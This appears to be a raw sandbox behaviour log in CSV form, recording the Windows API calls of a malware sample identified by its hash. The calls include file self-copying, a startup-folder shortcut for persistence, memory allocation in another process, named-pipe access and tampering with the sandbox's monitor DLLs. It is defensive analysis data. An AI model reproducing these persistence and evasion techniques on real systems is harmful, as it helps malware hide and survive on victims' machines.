"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001c4","nNumberOfBytesToRead->9614"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->9614"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001d6","hKey->0x00000062","lpSubKey->Network\SharingHandler"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d6","lpValueName->(null)"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001d4","lpValueName->UserEnvDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001d4","lpValueName->ChkAccDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Control\ProductOptions"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001d4","lpValueName->ProductType"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->0x000001c4","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->Personal"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->Local Settings"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->RsopDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->UserEnvDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->RsopLogging"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows\System"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\winlogon"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->UserEnvDebugLevel"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows\System"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","system","LoadLibraryW","SUCCESS","0x773d0000","lpFileName->comctl32.dll"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","system","LoadLibraryW","SUCCESS","0x76990000","lpFileName->ntshrui.dll"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001b8","nNumberOfBytesToRead->12288"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->12288"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\dll\cmonitor.dll"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","system","LoadLibraryA","SUCCESS","0x76980000","lpFileName->LINKINFO.dll"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->\\.\PIPE\srvsvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Control\ProductOptions"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c4","lpValueName->ProductType"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001c4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\CurrentControlSet\Services\LanmanServer\DefaultSecurity"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c4","lpValueName->SrvsvcDefaultShareInfo"
"20190910071259.103","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001b8","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->\\.\PIPE\srvsvc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->0x00000080"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","device","DeviceIoControl","SUCCESS","","hDevice->0x000001c4","dwIoControlCode->0x000900c0","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120ece4","nOutBufferSize->0x00000040","lpBytesReturned->0x0120ecdc","lpOverlapped->0x00000000"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001c4","lpFileName->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup\Soft.lnk","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001ba","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001de","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001de","lpValueName->DriveMask"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\dll\cmonitor.dll.exe","lpNewFileName->C:\cuckoo\dll\cmonitor.dll"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\dll\JTBmeJ.dll","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->268"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\dll\JTBmeJ.dll","dwDesiredAccess->GENERIC_READ"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->Start Menu"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001b8","lpValueName->Start Menu","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu","cbData->96"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->0x000001b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Generation"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\dll\JTBmeJ.dll.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.113","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
